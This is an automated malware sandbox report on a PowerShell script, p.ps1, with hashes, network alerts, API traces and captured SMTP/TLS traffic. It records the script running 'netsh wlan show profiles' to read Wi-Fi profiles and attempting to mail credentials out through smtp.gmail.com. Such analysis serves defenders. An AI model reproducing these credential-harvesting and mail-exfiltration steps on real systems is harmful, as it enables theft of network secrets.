popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

p.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 6, 2023, 12:08 p.m. Dec. 6, 2023, 12:12 p.m.
Size 876.0B
Type ASCII text, with very long lines
MD5 3dc32f74db9c2b56bca483d6e56316be
SHA256 56ed49af1ac80ae95a9643aafff85808cae49911ba44ef02e60b016c45ff0cad
CRC32 7C122B90
ssdeep 24:lodZVJd1HHnkr/Euok3cqG7rDsCL79vHtKf:OxntqwgIm
Yara None matched

Name Response Post-Analysis Lookup
smtp.gmail.com
A 142.251.8.108
64.233.188.108
IP Address Status Action
142.251.8.108 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 142.251.8.108:587 -> 192.168.56.103:49166 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 142.251.8.108:587 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49166
142.251.8.108:587 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=smtp.gmail.com 5b:45:37:1e:52:7e:3c:86:d1:d6:68:34:a3:03:1c:11:aa:87:0e:aa

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Send" with "4" argument(s): "The SMTP server requires a secu
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: re connection or the client was not authenticated. The server response was: 5.7
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: .0 Authentication Required. Learn more at"
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\p.ps1:30 char:11
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: + $smtp.Send <<<< ($email, $email, $subject, $creds);
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: The term 'pause' is not recognized as the name of a cmdlet, function, script fi
console_handle: 0x0000001f
1 1 0

WriteConsoleW

 buffer: le, or operable program. Check the spelling of the name, or if a path was inclu
console_handle: 0x0000002b
1 1 0

WriteConsoleW

 buffer: ded, verify that the path is correct and try again.
console_handle: 0x00000037
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\p.ps1:32 char:6
console_handle: 0x00000043
1 1 0

WriteConsoleW

 buffer: + pause <<<<
console_handle: 0x0000004f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (pause:String) [], CommandNotFou
console_handle: 0x0000005b
1 1 0

WriteConsoleW

 buffer: ndException
console_handle: 0x00000067
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000073
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02529000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06640000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05341000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 1158
family: 0
1 0 0
Data received 220 smtp.gmail.com ESMTP l3-20020a17090270c300b001cf6783fd41sm10974530plt.17 - gsmtp
Data received 250-smtp.gmail.com at your service, [175.208.134.152] 250-SIZE 35882577 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Data received 220 2.0.0 Ready to start TLS
Data received W
Data received Seoæ#E‹ÄBeáM›¹/°êU«ŽZèDOWNGRD z¶IY®&ׄVU5Ɲjí&¦ÈÏm±‘_S¢7ÿúÀ ÿ 
Data received 
Data received ™–0‚‰0‚q v`U{B[–¬tÃ'¢0  *†H†÷  0F1 0 UUS1"0 U Google Trust Services LLC10U GTS CA 1C30 231023112351Z 240115112350Z010Usmtp.gmail.com0Y0*†HÎ=*†HÎ=BWWk[K‘×ùCqK ˆÆŒvⱂÖ_ +g±X›¿–¿*>+ñqôåé·Õñ$q2æIÈJ:9Ø-£‚i0‚e0Uÿ€0U% 0 +0 Uÿ00U× ÉC*ø.kþ߈·¯ŸÙ0U#0€Št¯…Íî•Í=œÐâFóq5'0j+^0\0'+0†http://ocsp.pki.goog/gts1c301+0†%http://pki.goog/repo/certs/gts1c3.der0U0‚smtp.gmail.com0!U 00g 0  +Öy0<U50301 / -†+http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0‚ +Öy÷ôòwvÿˆ? ¶û•QÂaÌõ‡º4´¤Í»)ÜhB ŸægLZ:t‹\}Õ¢H0F!Ëiéí±l¦—°÷ßF¸§E"q-¢Jüãú!·Óݹ!º»¨sÖwI®n= zЍ.þ9ҋˆÒŒuTº‚ YĞw;Swu>-¹€N‹0[þ@;gØOÃôǽ -roáúÔ‹\}ÙkH0F!¡  9^Ì ¾Å–íY…Òó¯¢ñ¦i?uâˆíZs·Ø!zuS…ÿÚÍ%vÄõ—³3ñšp!{ ŽµW­Ï0  *†H†÷  ‚-ë/ïتÆÎ,íqmìcÞ¥GÎþâ¨R2êNœÊœ>¾z‚‹ý ˜s´–ó‡•éﲆ=AÀʛ—Þî³æöI›Ž©)|) ×s–†';È¿#®ÇÑ£jÐr¹™þòLÓIDÛG3$$žw鏖ÌÖZvø°N֘LØŸ’s’?íò+›iÕ£»ÒѦê“_ D0@¿œQ(™vãJÉw7¿¯²7¡¶ÐhäÃËcaÿ’w· ½HC2ڜ÷—”%Ç"«ë®­öÍâïVû/Y[yE/a¡žWÞ¯mRFL¯ÔÖˆ/QyŽzÁ#âùuZYb­>›Ë;随£š0‚–0‚~  ¼SYk4ÇõPf0  *†H†÷  0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10 200813000042Z 270930000042Z0F1 0 UUS1"0 U Google Trust Services LLC10U GTS CA 1C30‚"0  *†H†÷ ‚0‚ ‚õˆßçbŒ7ø7Bl‡Ðûe‚%ýèËk¤ÿméZ#â™öé’™| ŠúBÖ^V$ªz3„Ñéi»¹tìWLfh“w7USþ9M·4»_%w7;”ê<åÕ¼Ã´Cë.§Gï°DcØ´A…ÝA0H“¿·öàE!à–BÏÙ+eV4& ¨ý}Ê.ïêH|7M?Ÿƒßïu„.yW\üWn–ÿüŒš¦™¾%Ù–,÷*€€ëc<PI‡åŠÊ_+Y– ûQÛÊw ɖOïpIÇ\m ý™´´âÊ.wý-Ü ¶k Œ+–˜¹ð‹ö '»¶ãQ½®Ç›±‰£‚€0‚|0Uÿ†0U%0++0Uÿ0ÿ0UŠt¯…Íî•Í=œÐâFóq5'0U#0€ä¯+&q+H'…/Rf,ïð‰q>0h+\0Z0&+0†http://ocsp.pki.goog/gtsr100+0†$http://pki.goog/repo/certs/gtsr1.der04U-0+0) ' %†#http://crl.pki.goog/gtsr1/gtsr1.crl0WU P0N08 +Öy0*0(+https://pki.goog/repository/0g 0g 0  *†H†÷  ‚‰}¬ \ <¾š¨W•´®ú«¥rq´6•ýß@LÂF»$«ðPq"Û­ÄnÏñjoȃØΉ_‡l‡¸© £›¡b”“•ß[®f –žüµçi>zËFI_FáA±×˜Me4€?OŸlISA¤’!‚‚ñ£D[*PMÁS6óB¯TúŽwSd8' ½XÉ|9-[óÎÔí—Û¿ S$ y˜&òañSRýBŒf+?¡»ÿö›ãšq‰5($Ýá½ë-áHË=YƒQ´tƝ|Ʊ†[¯Ì4ÄÓÌԁ•¡ô"ú´ƒq¯Œ·Œs$¬7S?þ\í6”;½)®âÇ:b;lcـ¿Yq¬c'¹L Úös¿*ޏó¥l23ІQq™4º“]µQX÷²“èöY¾q›ýM(ÎÏmÇÜ÷ÑÖF›§Êkéwý ¶#ƒÙ „àDÓ¢u#³4†ö °¤^àRF±!pQõšÝüUô+3wÃKBÂñwüs€”ë»7?Î*f°s2¥2l2°ŽàÄ#ÿ[}Mep¬+›=ÎÛàmŽ2€¾–Ÿ’c¼—»]¹ôáq^*äï"±Še:À“eԅÍ[ƒYG-œ$:Ȁ¦&…›ö7›¬oùÅÃQóâűºQôÝf0‚b0‚J w½ lÛ6ùê!ÄðXÓ 0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10‚"0  *†H†÷ ‚0‚ ‚¶‹ã¡w›;Ü¿”>·•§@<¡ý‚ù}2‚qööŒûèÛ¼j.——£ŒKù+ö±ù΄±ùŗÞï¹ò£é¼‰^§ªR«ø#'ˤ±œcÛי~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ ‡»ÍHðMÂÂzˆŠ»ºÏYÖ¯°°ž1ñ‚ÁÀß.¦mlµØ~&E=°y¤”(­&å¨þ–è<h”Sîƒ:ˆ+– ²àzŒ.u֜ë§Vd–Oh®=—„À¼@À \½ö‡³5l¬P„àLÍ’Ó é3¼R™¯2µ)³%*´HùráÊd÷悍èÂŠˆú8fŠücùùxý{\wúv‡úìß±y•W´½&ïÖÑë »Ž µÅŊU«Ó¬ê‘K)̤2%N*ñeDÐΪÎI´êŸ|ƒ°@{çC«§l£}‰úL¥ÿՎÃÎKàµØ³ŽEÏvÀí@+ýS°§Õ; ±Š¢Þ1­Ìwêo{>Öߑ"æ¾úØ2ücQrÞ]Ö“½)h3ï:fìŠ&ß×Wex'Þ^I¢š¨!¶©±•°¥¹ ÚÇlH<@à~ ZÍV<ї¹ËKí9KœÄ?ÒUn$°ÖqúôÁºÌíõþAؘ=:È®z˜7•£‚80‚40Uÿ†0Uÿ0ÿ0Uä¯+&q+H'…/Rf,ïð‰q>0U#0€`{fE —ʉP/}Í4¨ÿüýK0`+T0R0%+0†http://ocsp.pki.goog/gsr10)+0†http://pki.goog/gsr1/gsr1.crt02U+0)0' % #†!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g 0g 0  +Öy0  +Öy0  *†H†÷  ‚4¤±(£Ð´v¦1z!éÑR>ÈÛtAˆ¸=5íäÿ“á\_«»ê|ÏÛä ыWò&o[¾Fh”7okzÈÀ7ú%Q¬ìh¿²ÈIýZšÊ#¬„€+Œ™—ëIjŒu×Ç޲ɗŸXHW5¡äÖýoƒoïŒÏ—¯À…*ðõNi ‘-áh¸Á+séÔÙü"À7 fIíUgá2×Ó&¿pã=ôgm=|å4ˆã2ú§njo½‹‘îKè;©³7çÃD¤~Øl×ÇFõ’›çÕ!¾f’”UlÔ)² Áf[âwIH(í×3rS³‚5Ïb‹É$‹¥·9 »~*A¿RÏü¢–¶Â‚?
Data received ‘
Data received AWÑnjΠ«lˆq|&Ô®!ø8î|ö°n9+ÍÕéi¯8“±b˜SÀàžɑ¯r¦3ó^А§ÿzò}B§†ƒ¡^F0D KN&ìV^Ȗî×LVV*c_î ngíì/Z”8 «_}ü ?d¨õG˜a\® žäš[šk³Q\3p‰±p'š ¤
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ƒ; ãÊ;±Ý´À´;kbÃšü¥æ[\œs{~(L¶î^‹Û…`žd”YÜ̸…
Data received 
Data received Ú>“Áõb}" ž? †ØFŸl$¨'™KRØÓy¢9¼²½ÛtV÷¬qKaºžyvDÓv&¤ísLÇiS¥˜Ék«ÝÛ+ÊÿJ;»“ð¶>#‡¹éºä$±d-üM…E´úŸ3_7½q’ ýZdóGœcr×8“Þ¹µÆJ»“ÒÍo¾¦yªú ËðÙ)QŠÔz‘‰.š"VZF{ªúE§ÐYÏ+.¥ÞúŽƒEê áSÊÃt°éé˜é7®)gýé°2¬+^ Li'-ùŽ * ~DÇM´£B=-ˆ ›>vS~ ÜPbÿÎ@АP#Néh–ŸÂä
Data received 0
Data received £äL}ñPRYAÒªÑ"Ý7Ž}Ì=n›DºîÀÁ’\¹´p¹êÕnË}/Ú´­j
Data received Ð
Data received 8så=–ô³ª£»Ñ\wšB‘A‘ ‰ÜäÞL.ÂþÚ¼ îâ†êsF®è¢RXœah頛etøü– ¬<áuKæ8˨m-ƒ/®;oÙÍüD°^ª±±¨õ*Xûˆ0Y³¨’Ú۝.mJ0•„b!Ð灗}SûҾÊbãyïÑW4aÊ Ú/ðp øšëÃýŤ°ÖÜ1Û&^âVvÝú× C¹Œ)¤wàƒßÈ|[2£€Jî­é2òfR]ëÆ×Ýc ْ
Data received À
Data received ౒2…\ª3‚×âƒÄ/ñ|¸ü×e›µ"“µìÓÊ3]Ýô ˜ú˜ wŽ’|>ˀ\xÀ^€ª`œ×1îRâÏS¾MØ•ð¤)ºHyÖ¶j­èóG¥ùÿ æ>v€LUʁ™:ѽ»„t¯oE2\¾,0GÕÍÑ` XpÄ+Š-ÃÁ·¹®|(K&°ª„³S—O:˜É—$$£Z9üý¶¡½gëlÂiîS?<‹×™°4ÑâR
Data sent EHLO test22-PC
Data sent STARTTLS
Data sent qmeoå¡þ+NøDcrª|+ÉSí4 ,z‘¨4lã{Œd÷ T/5 ÀÀÀ À 28,ÿsmtp.gmail.com  
Data sent FBAP¸SŸL=Çyïöf[ªEGÂu5ªûp|ó„ÈØÞân\R$ ýÅl}ZîÞvª©¥çÈêW„­^d-¬ˆ0;‰ˆ=†ZÔ,ú×Y,v^E†ƒ³>§pÏеÀ™y=s†°‘š«z­Ìdbe¡{òq^ªP
Data sent 0Œð¡©e¯=¿¥V¡…Q8>èÆû—WïÀ.]¶‘¡HuDnƽqÓG}>xy&o
Data sent @;\{(¿ ßƕ.Öî:ûNٚÿ_Z„ØÿB¯wçc¤èâ¬Q¿N"7ÈåÉÃ\ŽG©_ÍàÄñrR쨩Œ
Data sent 0N%J ¢Âd^yŽ8ڔ¨œEQË)CbÅë)â„%U“5¤ûÇCy)ˆ±Ûr[©"÷÷
Data sent @M»R”ú߂ò'æ4KDÚ°6͊ϰȘŸ"-åx<‰-<[ AŽ!5M U~Ú+Üòžíî"¿Å~¯Ê^
domain smtp.gmail.com
cmdline "C:\Windows\system32\netsh.exe" wlan show profiles
receiver [] sender [] server 142.251.8.108
description powershell.exe tried to sleep 2728263 seconds, actually delayed analysis time by 2728263 seconds
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

 buffer: EHLO test22-PC
socket: 1492
sent: 16
1 16 0

send

 buffer: STARTTLS
socket: 1492
sent: 10
1 10 0

send

 buffer: qmeoå¡þ+NøDcrª|+ÉSí4 ,z‘¨4lã{Œd÷ T/5 ÀÀÀ À 28,ÿsmtp.gmail.com  
socket: 1492
sent: 118
1 118 0

send

 buffer: FBAP¸SŸL=Çyïöf[ªEGÂu5ªûp|ó„ÈØÞân\R$ ýÅl}ZîÞvª©¥çÈêW„­^d-¬ˆ0;‰ˆ=†ZÔ,ú×Y,v^E†ƒ³>§pÏеÀ™y=s†°‘š«z­Ìdbe¡{òq^ªP
socket: 1492
sent: 134
1 134 0

send

 buffer: 0Œð¡©e¯=¿¥V¡…Q8>èÆû—WïÀ.]¶‘¡HuDnƽqÓG}>xy&o
socket: 1492
sent: 53
1 53 0

send

 buffer: @;\{(¿ ßƕ.Öî:ûNٚÿ_Z„ØÿB¯wçc¤èâ¬Q¿N"7ÈåÉÃ\ŽG©_ÍàÄñrR쨩Œ
socket: 1492
sent: 69
1 69 0

send

 buffer: 0N%J ¢Âd^yŽ8ڔ¨œEQË)CbÅë)â„%U“5¤ûÇCy)ˆ±Ûr[©"÷÷
socket: 1492
sent: 53
1 53 0

send

 buffer: @M»R”ú߂ò'æ4KDÚ°6͊ϰȘŸ"-åx<‰-<[ AŽ!5M U~Ú+Üòžíî"¿Å~¯Ê^
socket: 1492
sent: 69
1 69 0
parent_process powershell.exe martian_process "C:\Windows\system32\netsh.exe" wlan show profiles
file C:\Windows\System32\netsh.exe